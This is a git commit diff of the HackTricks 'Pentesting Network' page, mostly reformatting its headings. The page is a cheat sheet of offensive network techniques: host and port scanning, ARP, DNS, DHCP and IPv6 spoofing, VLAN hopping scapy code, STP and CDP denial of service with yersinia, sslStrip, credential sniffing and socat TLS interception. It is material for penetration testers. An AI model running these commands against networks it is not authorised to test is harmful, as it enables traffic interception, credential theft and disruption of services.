GitBook: [#3168] No subject

This commit is contained in:
CPol 2022-05-01 23:58:57 +00:00 committed by gitbook-bot
parent ccc4364d34
commit 835bee0d5d
No known key found for this signature in database
GPG Key ID: 07D2180C7B12D0FF
2 changed files with 84 additions and 81 deletions

View File

@ -18,7 +18,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
{% hint style="danger" %}
<img src="../../.gitbook/assets/image (620) (2) (1) (1) (2).png" alt="" data-size="original">\
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!\\
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
{% embed url="https://go.intigriti.com/hacktricks" %}
{% endhint %}

View File

@ -1,4 +1,4 @@
# Pentesting Network
<details>
@ -16,13 +16,19 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>
{% hint style="danger" %}
<img src="../../.gitbook/assets/image (620) (2) (1) (1) (2).png" alt="" data-size="original">****\
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
# Discovering hosts from the outside
{% embed url="https://go.intigriti.com/hacktricks" %}
{% endhint %}
## Discovering hosts from the outside
This is going to be a **brief section** about how to find **IPs responding** from the **Internet**.\
In this situation you have some **scope of IPs** (maybe even several **ranges**) and you just to find **which IPs are responding**.
## ICMP
### ICMP
This is the **easiest** and **fastest** way to discover if a host is up or not.\
You could try to send some **ICMP** packets and **expect responses**. The easiest way is just sending an **echo request** and expect from the response. You can do that using a simple `ping`or using `fping`for **ranges**.\
@ -34,7 +40,7 @@ fping -g 199.66.11.0/24 # Send echo requests to ranges
nmap -PEPM -sP -n 199.66.11.0/24 #Send echo, timestamp requests and subnet mask requests
```
## TCP Port Discovery
### TCP Port Discovery
It's very common to find that all kind of ICMP packets are being filtered. Then, all you can do to check if a host is up is **try to find open ports**. Each host has **65535 ports**, so, if you have a "big" scope you **cannot** test if **each port** of each host is open or not, that will take too much time.\
Then, what you need is a **fast port scanner** ([masscan](https://github.com/robertdavidgraham/masscan)) and a list of the **ports more used:**
@ -46,7 +52,7 @@ masscan -p20,21-23,25,53,80,110,111,135,139,143,443,445,993,995,1723,3306,3389,5
You could also perform this step with `nmap`, but it slower and somewhat `nmap`has problems identifying hosts up.
## HTTP Port Discovery
### HTTP Port Discovery
This is just a TCP port discovery useful when you want to **focus on discovering HTTP** **services**:
@ -54,7 +60,7 @@ This is just a TCP port discovery useful when you want to **focus on discovering
masscan -p80,443,8000-8100,8443 199.66.11.0/24
```
## UDP Port Discovery
### UDP Port Discovery
You could also try to check for some **UDP port open** to decide if you should **pay more attention** to a **host.** As UDP services usually **don't respond** with **any data** to a regular empty UDP probe packet it is difficult to say if a port is being filtered or open. The easiest way to decide this is to send a packet related to the running service, and as you don't know which service is running, you should try the most probable based on the port number:
@ -66,14 +72,14 @@ nmap -sU -sV --version-intensity 0 -F -n 199.66.11.53/24
The nmap line proposed before will test the **top 1000 UDP ports** in every host inside the **/24** range but even only this will take **>20min**. If need **fastest results** you can use [**udp-proto-scanner**](https://github.com/portcullislabs/udp-proto-scanner): `./udp-proto-scanner.pl 199.66.11.53/24` This will send these **UDP probes** to their **expected port** (for a /24 range this will just take 1 min): _DNSStatusRequest, DNSVersionBindReq, NBTStat, NTPRequest, RPCCheck, SNMPv3GetRequest, chargen, citrix, daytime, db2, echo, gtpv1, ike,ms-sql, ms-sql-slam, netop, ntp, rpc, snmp-public, systat, tftp, time, xdmcp._
## SCTP Port Discovery
### SCTP Port Discovery
```bash
#Probably useless, but it's pretty fast, why not trying?
nmap -T4 -sY -n --open -Pn <IP/range>
```
# Pentesting Wifi
## Pentesting Wifi
Here you can find a nice guide of all the well known Wifi attacks at the time of the writing:
@ -81,11 +87,11 @@ Here you can find a nice guide of all the well known Wifi attacks at the time of
[pentesting-wifi](../pentesting-wifi/)
{% endcontent-ref %}
# Discovering hosts from the inside
## Discovering hosts from the inside
If you are inside the network one of the first things you will want to do is to **discover other hosts**. Depending on **how much noise** you can/want to do, different actions could be performed:
## Passive
### Passive
You can use these tools to passively discover hosts inside a connected network:
@ -98,7 +104,7 @@ net.show
set net.show.meta true #more info
```
## Active
### Active
Note that the techniques commented in [_**Discovering hosts from the outside**_](./#discovering-hosts-from-the-outside) (_TCP/HTTP/UDP/SCTP Port Discovery_) can be also **applied here**.\
But, as you are in the **same network** as the other hosts, you can do **more things**:
@ -123,7 +129,7 @@ net.probe.throttle 10 #10ms between requests sent (Discover local)
alive6 <IFACE> # Send a pingv6 to multicast.
```
## Active ICMP
### Active ICMP
Note that the techniques commented in _Discovering hosts from the outside_ ([_**ICMP**_](./#icmp)) can be also **applied here**.\
But, as you are in the **same network** as the other hosts, you can do **more things**:
@ -132,7 +138,7 @@ But, as you are in the **same network** as the other hosts, you can do **more th
* Pinging the **network broadcast address** you could even find hosts inside **other subnets**: `ping -b 255.255.255.255`
* Use the `-PEPM` flag of `nmap`to perform host discovery sending **ICMPv4 echo**, **timestamp**, and **subnet mask requests:** `nmap -PEPM -sP vvv -n 10.12.5.0/24`
## **Wake On Lan**
### **Wake On Lan**
Wake On Lan is used to **turn on** computers through a **network message**. The magic packet used to turn on the computer is only a packet where a **MAC Dst** is provided and then it is **repeated 16 times** inside the same paket.\
Then this kind of packets are usually sent in an **ethernet 0x0842** or in a **UDP packet to port 9**.\
@ -145,11 +151,11 @@ wol.udp [MAC] #Send a WOL as an IPv4 broadcast packet to UDP port 9
# Bettercap2 can also be used for this purpose
```
# Scanning Hosts
## Scanning Hosts
Once you have discovered all the IPs (external or internal) you want to scan in depth, different actions can be performed.
## TCP
### TCP
* **Open** port: _SYN --> SYN/ACK --> RST_
* **Closed** port: _SYN --> RST/ACK_
@ -168,7 +174,7 @@ nmap -sV -sC -O -p- -n -Pn -oA fullscan <IP>
syn.scan 192.168.1.0/24 1 10000 #Ports 1-10000
```
## UDP
### UDP
There are 2 options to scan an UDP port:
@ -189,7 +195,7 @@ nmap -sU -sV --version-intensity 0 -n -T4 <IP>
# You could use nmap to test all the UDP ports, but that will take a lot of time
```
## SCTP Scan
### SCTP Scan
SCTP sits alongside TCP and UDP. Intended to provide **transport** of **telephony** data over **IP**, the protocol duplicates many of the reliability features of Signaling System 7 (SS7), and underpins a larger protocol family known as SIGTRAN. SCTP is supported by operating systems including IBM AIX, Oracle Solaris, HP-UX, Linux, Cisco IOS, and VxWorks.
@ -202,19 +208,19 @@ nmap -T4 -sY -n -oA SCTFastScan <IP>
nmap -T4 -p- -sY -sV -sC -F -n -oA SCTAllScan <IP>
```
## IDS and IPS evasion
### IDS and IPS evasion
{% content-ref url="ids-evasion.md" %}
[ids-evasion.md](ids-evasion.md)
{% endcontent-ref %}
## **More nmap options**
### **More nmap options**
{% content-ref url="nmap-summary-esp.md" %}
[nmap-summary-esp.md](nmap-summary-esp.md)
{% endcontent-ref %}
## Revealing Internal IP Addresses
### Revealing Internal IP Addresses
Misconfigured routers, firewalls, and network devices sometimes **respond** to network probes **using nonpublic source addresses**. You can use _tcpdump_ used to **identify packets** received from **private addresses** during testing. In this case, the _eth2_ interface in Kali Linux is **addressable** from the **public Internet** (If you are **behind** a **NAT** of a **Firewall** this kind of packets are probably going to be **filtered**).
@ -226,13 +232,13 @@ IP 10.10.0.1 > 185.22.224.18: ICMP echo reply, id 25804, seq 1582, length 64
IP 10.10.0.2 > 185.22.224.18: ICMP echo reply, id 25804, seq 1586, length 64
```
# Sniffing
## Sniffing
Sniffing you can learn details of IP ranges, subnet sizes, MAC addresses, and hostnames by reviewing captured frames and packets. If the network is misconfigured or switching fabric under stress, attackers can capture sensitive material via passive network sniffing.
If a switched Ethernet network is configured properly, you will only see broadcast frames and material destined for your MAC address.
## TCPDump
### TCPDump
```bash
sudo tcpdump -i <INTERFACE> udp port 53 #Listen to DNS request to discover what is searching the host
@ -240,7 +246,7 @@ tcpdump -i <IFACE> icmp #Listen to icmp packets
sudo bash -c "sudo nohup tcpdump -i eth0 -G 300 -w \"/tmp/dump-%m-%d-%H-%M-%S-%s.pcap\" -W 50 'tcp and (port 80 or port 443)' &"
```
## Bettercap2
### Bettercap2
```bash
net.sniff on
@ -251,21 +257,21 @@ net.sniff.filter
net.sniff.regexp
```
## Wireshark
### Wireshark
Obviously.
## Capturing credentials
### Capturing credentials
You can us tools like [https://github.com/lgandx/PCredz](https://github.com/lgandx/PCredz) to parse credentials from a pcap or a live interface.
# LAN attacks
## LAN attacks
## ARP spoofing
### ARP spoofing
ARP Spoofing consist on sending gratuitous ARPResponses to indicate that the IP of a machine has the MAC of our device. Then, the victim will change the ARP table and will contact our machine every time it wants to contact the IP spoofed.
### **Bettercap2**
#### **Bettercap2**
```bash
arp.spoof on
@ -275,7 +281,7 @@ arp.spoof.whitelist
arp.spoof.internal #Spoofed local connections (by default only Victim <--> Gateway
```
### **Arpspoof**
#### **Arpspoof**
```bash
echo 1 > /proc/sys/net/ipv4/ip_forward
@ -283,7 +289,7 @@ arpspoof -t 192.168.1.1 192.168.1.2
arpspoof -t 192.168.1.2 192.168.1.1
```
## MAC Flooding - CAM overflow
### MAC Flooding - CAM overflow
Overflow the switchs CAM table sending a lot of packets with different source mac address. When the CAM table is full the switch start behaving like a hub (broadcasting all the traffic).
@ -293,9 +299,9 @@ macof -i <interface>
In modern switches this vulnerability has been fixed.
## 802.1Q VLAN
### 802.1Q VLAN
### Dynamic Trunking
#### Dynamic Trunking
Many switches support the Dynamic Trunking Protocol (DTP) by default, however, which an adversary can abuse to **emulate a switch and receive traffic across all VLANs**. The tool [_**dtpscan.sh**_](https://github.com/commonexploits/dtpscan) can sniff an interface and **reports if switch is in Default mode, trunk, dynamic, auto or access mode** (this is the only one that would avoid VLAN hopping). The tool will indicate if the switch is vulnerable or not.
@ -316,7 +322,7 @@ yersinia -G #For graphic mode
To access the VLAN packets
### Attacking specific VLANs
#### Attacking specific VLANs
Once you known VLAN IDs and IPs values, you can **configure a virtual interface to attack a specific VLAN**.\
If DHCP is not available, then use _ifconfig_ to set a static IP address.
@ -347,11 +353,11 @@ vconfig add eth1 20
ifconfig eth1.20 192.168.1.2 netmask 255.255.255.0 up
```
### Automatic VLAN Hopper
#### Automatic VLAN Hopper
The discussed attack of **Dynamic Trunking and creating virtual interfaces an discovering hosts inside** other VLANs are **automatically performed** by the tool: [**https://github.com/nccgroup/vlan-hopping---frogger**](https://github.com/nccgroup/vlan-hopping---frogger)
### Double Tagging
#### Double Tagging
If an attacker knows the value of the **MAC, IP and VLAN ID of the victim host**, he could try to **double tag a frame** with its designated VLAN and the VLAN of the victim and send a packet. As the **victim won't be able to connect back** with the attacker, so the **best option for the attacker is communicate via UDP** to protocols that can perform some interesting actions (like SNMP).
@ -368,17 +374,17 @@ packet = Ether()/Dot1Q(vlan=1)/Dot1Q(vlan=20)/IP(dst='192.168.1.10')/ICMP()
sendp(packet)
```
### Layer 3 Private VLAN Bypass
#### Layer 3 Private VLAN Bypass
In guest wireless networks and other environments, private VLAN (also known as _port isolation_) settings are used to **prevent peers from interacting** (i.e., clients **connect to a wireless access point but cannot address one another**). Depending on network ACLs (or lack thereof), it might be possible to send IP packets up to a router, which are then forwarded back to a neighbouring peer.
This attack will send a **specially crafted packet to the IP of a client but with the MAC of the router**. Then, the **router will redirect the packet to the client**. As in _Double Tagging Attacks_ you can exploit this vulnerability by controlling a host accessible by the victim.
## STP Attacks
### STP Attacks
**If you cannot capture BPDU frames on your interfaces, it is unlikely that you will succeed in an STP attack.**
### **STP BPDU DoS**
#### **STP BPDU DoS**
Sending a lot of BPDUs TCP (Topology Change Notification) or Conf (the BPDUs that are sent when the topology is created) the switches are overloaded and stop working correctly.
@ -388,7 +394,7 @@ yersinia stp -attack 3
#Use -M to disable MAC spoofing
```
### **STP TCP Attack**
#### **STP TCP Attack**
When a TCP is sent, the CAM table of the switches will be deleted in 15s. Then, if you are sending continuously this kind of packets, the CAM table will be restarted continuously (or every 15segs) and when it is restarted, the switch behaves as a hub
@ -397,7 +403,7 @@ yersinia stp -attack 1 #Will send 1 TCP packet and the switch should restore the
yersinia stp -attack 0 #Will send 1 CONF packet, nothing else will happen
```
### **STP Root Attack**
#### **STP Root Attack**
The attacker simulates the behaviour of a switch to become the STP root of the network. Then, more data will pass through him. This is interesting when you are connected to two different switches.\
This is done by sending BPDUs CONF packets saying that the **priority** value is less than the actual priority of the actual root switch.
@ -414,7 +420,7 @@ yersinia stp -attack 6 #This will cause a DoS as the layer 2 packets wont be for
ettercap -T -i eth1 -B eth2 -q #Set a bridge between 2 interfaces to forwardpackages
```
## CDP Attacks
### CDP Attacks
CISCO Discovery Protocol is the protocol used by CISCO devices to talk among them, **discover who is alive** and what features does they have. You can make a DoS attack to a CISCO switch by exhausting the device memory simulating real CISCO devices.
@ -428,7 +434,7 @@ sudo yersinia cdp -attack 0 #Send a CDP packet
You could also use [scapy](https://github.com/secdev/scapy/). Be sure to install it with `scapy/contrib` package.
### VoIP Attacks
#### VoIP Attacks
Although intended for use by the employees Voice over Internet Protocol (VoIP) phones, modern VoIP devices are increasingly integrated with IoT devices. Many employees can now unlock doors using a special phone number, control the rooms thermostat...
@ -444,9 +450,9 @@ voiphopper -i eth1 -E 'SEP001EEEEEEEEE ' -c 2
If the tool executes successfully, the **VLAN network will assign an IPv4 address to the attackers device**.
## DHCP
### DHCP
### Enumeration
#### Enumeration
```bash
nmap --script broadcast-dhcp-discover
@ -482,7 +488,7 @@ A more automatic way of doing this is using the tool [DHCPing](https://github.co
You could use the mentioned DoS attacks to force clients to obtain new leases within the environment, and exhaust legitimate servers so that they become unresponsive. So when the legitimate try to reconnect, **you can server malicious values mentioned in the next attack**.
### Set malicious values
#### Set malicious values
You can use Responder DHCP script (_/usr/share/responder/DHCP.py_) to establish a rogue DHCP server. Setting a malicious gateway is not ideal, because the hijacked connection is only half-duplex (i.e., we capture egress packets from the client, but not the responses from the legitimate gateway). As such, I would recommend setting a rogue DNS or WPAD server to capture HTTP traffic and credentials in particular.
@ -499,7 +505,7 @@ You can use Responder DHCP script (_/usr/share/responder/DHCP.py_) to establish
| Spoof the default gateway IP address | -S |
| Respond to all DHCP requests (very noisy) | -R |
## **EAP**
### **EAP**
Here are some of the attack tactics that can be used against 802.1X implementations:
@ -515,7 +521,7 @@ If the attacker if between the victim and the authentication server, he could tr
eapmd5pass r pcap.dump w /usr/share/wordlist/sqlmap.txt
```
## HSRP AND VRRP
### HSRP AND VRRP
Hot Standby Routing Protocol (HSRP) and the Virtual Router Redundancy Protocol (VRRP) are used in high-availability environments to provide failover support. Routers send packets to local multicast groups announcing configuration and priority details.
@ -523,19 +529,19 @@ HSRP is a proprietary Cisco protocol with no RFC, whereas VRRP is standardized.
For more information about how to attack this protocols go to the book _**Network Security Assessment: Know Your Network (3rd edition)**_
## RIP
### RIP
Three versions of the Routing Information Protocol (RIP) exist—RIP, RIPv2, and RIPng. RIP and RIPv2 use UDP datagrams sent to peers via port 520, whereas RIPng broadcasts datagrams to UDP port 521 via IPv6 multicast. RIPv2 introduced MD5 authentication support. RIPng does not incorporate native authentication; rather, it relies on optional IPsec AH and ESP headers within IPv6.
For more information about how to attack this protocol go to the book _**Network Security Assessment: Know Your Network (3rd edition).**_
### EIGRP
#### EIGRP
The Enhanced Interior Gateway Routing Protocol (EIGRP) is Cisco proprietary and can be run with or without authentication. \_\_[Coly](https://code.google.com/p/coly/) supports capture of EIGRP broadcasts and injection of packets to manipulate routing configuration.
For more information about how to attack this protocol go to the book _**Network Security Assessment: Know Your Network (3rd edition).**_
## OSPF
### OSPF
Most Open Shortest Path First (OSPF) implementations use MD5 to provide authentication between routers. Loki and John the Ripper can capture and attack MD5 hashes to reveal the key, which can then be used to advertise new routes. The route parameters are set by using the _Injection_ tab, and the key set under _Connection_.
@ -545,7 +551,7 @@ For more information about how to attack this protocol go to the book _**Network
You can find some more information about network attacks [here](https://github.com/Sab0tag3d/MITM-cheatsheet). _\*\*(TODO: Read it all and all new attacks if any)_
# **Spoofing**
## **Spoofing**
The attacker configures all the network parameters (GW, IP, DNS) of the new member of the network sending fake DHCP responses.
@ -554,11 +560,11 @@ Ettercap
yersinia dhcp -attack 2 #More parameters are needed
```
## ARP Spoofing
### ARP Spoofing
Check the [previous section](./#arp-spoofing).
## ICMPRedirect
### ICMPRedirect
ICMP Redirect consist on sending an ICMP packet type 1 code 5 that indicates that the attacker is the best way to reach an IP. Then, when the victim wants to contact the IP, it will send the packet through the attacker.
@ -568,7 +574,7 @@ icmp_redirect
hping3 [VICTIM IP ADDRESS] -C 5 -K 1 -a [VICTIM DEFAULT GW IP ADDRESS] --icmp-gw [ATTACKER IP ADDRESS] --icmp-ipdst [DST IP ADDRESS] --icmp-ipsrc [VICTIM IP ADDRESS] #Send icmp to [1] form [2], route to [3] packets sent to [4] from [5]
```
## DNS Spoofing
### DNS Spoofing
The attacker will resolve some (or all) the domains that the victim ask for.
@ -583,7 +589,7 @@ apt-get install dnsmasqecho "addn-hosts=dnsmasq.hosts" > dnsmasq.conf #Create dn
dig @localhost domain.example.com # Test the configured DNS
```
## Local Gateways
### Local Gateways
Multiple routes to systems and networks often exist. Upon building a list of MAC addresses within the local network, use _gateway-finder.py_ to identify hosts that support IPv4 forwarding.
@ -605,14 +611,14 @@ gateway-finder v1.0 http://pentestmonkey.net/tools/gateway-finder
[+] We can reach TCP port 80 on 209.85.227.99 via 00:13:72:09:AD:76 [10.0.0.100]
```
## [Spoofing LLMNR, NBT-NS, and mDNS](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)
### [Spoofing LLMNR, NBT-NS, and mDNS](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)
Microsoft systems use Link-Local Multicast Name Resolution (LLMNR) and the NetBIOS Name Service (NBT-NS) for local host resolution when DNS lookups fail. Apple Bonjour and Linux zero-configuration implementations use Multicast DNS (mDNS) to discover systems within a network. These protocols are unauthenticated and broadcast messages over UDP; thus, attackers can exploit them to direct users to malicious services.
You can impersonate services that are searched by hosts using Responder to send fake responses.\
Read here more information about [how to Impersonate services with Responder](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md).
## [Spoofing WPAD](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)
### [Spoofing WPAD](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)
Many browsers use Web Proxy Auto-Discovery (WPAD) to load proxy settings from the network. A WPAD server provides client proxy settings via a particular URL (e.g., [http://wpad.example.org/wpad.dat](http://wpad.example.org/wpad.dat)) upon being identified through any of the following:
@ -623,11 +629,11 @@ Many browsers use Web Proxy Auto-Discovery (WPAD) to load proxy settings from th
Responder automates the WPAD attack—running a proxy and directing clients to a malicious WPAD server via DHCP, DNS, LLMNR, and NBT-NS.\
Read here more information about [how to Impersonate services with Responder](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md).
## [Spoofing SSDP and UPnP devices](spoofing-ssdp-and-upnp-devices.md)
### [Spoofing SSDP and UPnP devices](spoofing-ssdp-and-upnp-devices.md)
You can offer different services in the network to try to **trick a user** to enter some **plain-text credentials**. **More information about this attack in** [**Spoofing SSDP and UPnP Devices**](spoofing-ssdp-and-upnp-devices.md)**.**
## IPv6 Neighbor Spoofing
### IPv6 Neighbor Spoofing
This attack is very similar to ARP Spoofing but in the IPv6 world. You can get the victim think that the IPv6 of the GW has the MAC of the attacker.
@ -636,7 +642,7 @@ sudo parasite6 -l eth0 # This option will respond to every requests spoofing the
sudo fake_advertise6 -r -w 2 eth0 <Router_IPv6> #This option will send the Neighbor Advertisement packet every 2 seconds
```
## IPv6 Router Advertisement Spoofing/Flooding
### IPv6 Router Advertisement Spoofing/Flooding
Some OS configure by default the gateway from the RA packets sent in the network. To declare the attacker as IPv6 router you can use:
@ -646,7 +652,7 @@ ip route add default via <ROUTER_IPv6> dev wlan0
fake_router6 wlan0 fe80::01/16
```
## IPv6 DHCP spoofing
### IPv6 DHCP spoofing
By default some OS try to configure the DNS reading a DHCPv6 packet in the network. Then, an attacker could send a DHCPv6 packet to configure himself as DNS. The DHCP also provides an IPv6 to the victim.
@ -657,11 +663,11 @@ dhcp6.spoof.domains <list of domains>
mitm6
```
## HTTP (fake page and JS code injection)
### HTTP (fake page and JS code injection)
# Internet Attacks
## Internet Attacks
## sslStrip
### sslStrip
Basically what this attack does is, in case the **user** try to **access** a **HTTP** page that is **redirecting** to the **HTTPS** version. **sslStrip** will **maintain** a **HTTP connection with** the **client and** a **HTTPS connection with** the **server** so it ill be able to **sniff** the connection in **plain text**.
@ -676,7 +682,7 @@ iptables -A INPUT -p tcp --destination-port 10000 -j ACCEPT
More info [here](https://www.blackhat.com/presentations/bh-dc-09/Marlinspike/BlackHat-DC-09-Marlinspike-Defeating-SSL.pdf).
## sslStrip+ and dns2proxy for bypassing HSTS
### sslStrip+ and dns2proxy for bypassing HSTS
The **difference** between **sslStrip+ and dns2proxy** against **sslStrip** is that they will **redirect** for example _**www.facebook.com**_ **to** _**wwww.facebook.com**_ (note the **extra** "**w**") and will set the **address of this domain as the attacker IP**. This way, the **client** will **connect** to _**wwww.facebook.com**_ **(the attacker)** but behind the scenes **sslstrip+** will **maintain** the **real connection** via https with **www.facebook.com**.
@ -689,16 +695,16 @@ More info [here](https://www.bettercap.org/legacy/#hsts-bypass), [here](https://
TODO: easy-creds, evilgrade, metasploit, factory
# TCP listen in port
## TCP listen in port
```
sudo nc -l -p 80
socat TCP4-LISTEN:80,fork,reuseaddr -
```
# TCP + SSL listen in port
## TCP + SSL listen in port
### Generate keys and self-signed certificate
#### Generate keys and self-signed certificate
```
FILENAME=server
@ -710,13 +716,13 @@ openssl req -new -key $FILENAME.key -x509 -sha256 -days 3653 -out $FILENAME.crt
cat $FILENAME.key $FILENAME.crt >$FILENAME.pem
```
### Listen using certificate
#### Listen using certificate
```
sudo socat -v -v openssl-listen:443,reuseaddr,fork,cert=$FILENAME.pem,cafile=$FILENAME.crt,verify=0 -
```
### Listen using certificate and redirect to the hosts
#### Listen using certificate and redirect to the hosts
```
sudo socat -v -v openssl-listen:443,reuseaddr,fork,cert=$FILENAME.pem,cafile=$FILENAME.crt,verify=0 openssl-connect:[SERVER]:[PORT],verify=0
@ -727,7 +733,7 @@ Another interesting test, is to serve a c**ertificate of the requested hostname
Other things to test is to try to sign the certificate with a valid certificate that it is not a valid CA. Or to use the valid public key, force to use an algorithm as diffie hellman (one that do not need to decrypt anything with the real private key) and when the client request a probe of the real private key (like a hash) send a fake probe and expect that the client does not check this.
# Bettercap 2
## Bettercap 2
```bash
# Events
@ -755,15 +761,15 @@ set wifi.ap.encryption false #If true, WPA2
wifi.recon on; wifi.ap
```
## Active Discovery Notes
### Active Discovery Notes
Take into account that when a UDP packet is sent to a device that do not have the requested port an ICMP (Port Unreachable) is sent.
## **ARP discover**
### **ARP discover**
ARP packets are used to discover wich IPs are being used inside the network. The PC has to send a request for each possible IP address and only the ones that are being used will respond.
## **mDNS (multicast DNS)**
### **mDNS (multicast DNS)**
Bettercap send a MDNS request (each X ms) asking for **\_services\_.dns-sd.\_udp.local** the machine that see this paket usually answer this request. Then, it only searchs for machine answering to "services".
@ -773,19 +779,18 @@ Bettercap send a MDNS request (each X ms) asking for **\_services\_.dns-sd.\_udp
* Bettercap (net.probe.mdns)
* Responder
## **NBNS (NetBios Name Server)**
### **NBNS (NetBios Name Server)**
Bettercap broadcast packets to the port 137/UDP asking for the name "CKAAAAAAAAAAAAAAAAAAAAAAAAAAA".
## **SSDP (Simple Service Discovery Protocol)**
### **SSDP (Simple Service Discovery Protocol)**
Bettercap broadcast SSDP packets searching for all kind of services (UDP Port 1900).
## **WSD (Web Service Discovery)**
### **WSD (Web Service Discovery)**
Bettercap broadcast WSD packets searching for services (UDP Port 3702).
<details>
<summary><strong>Support HackTricks and get benefits!</strong></summary>
@ -801,5 +806,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details>